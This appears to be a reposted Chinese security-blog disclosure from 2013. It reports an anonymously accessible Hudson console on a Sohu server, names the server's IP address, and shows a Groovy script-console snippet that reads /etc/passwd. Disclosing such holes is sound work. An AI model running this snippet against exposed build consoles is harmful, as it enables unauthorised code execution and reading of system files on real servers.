记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

搜狐某应用远程Groovy代码执行

2013-03-24 01:25
hudson管理软件,管理地址对外,而且可以匿名访问:
 
http://220.181.26.142:8080/
 
好象主要是做cvs服务的:
 
 




 
 
这个管理软件不太了解,找到个可以执行Groovy命令的地方(查了一下Groovy,与java代码类似):
 
 
 
 
 
 
执行Groovy代码,读取服务器本地/etc/passwd文件:
 
try{ 
   text = new File("/etc/passwd").getText(); 
   out.print text
} catch(Exception e){ 
}
 
 
 
 
 
修复方案:
刚看了一下,如果都这样的话,有压力啊!
知识来源: www.2cto.com/Article/201303/197476.html

阅读:117896 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“搜狐某应用远程Groovy代码执行”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云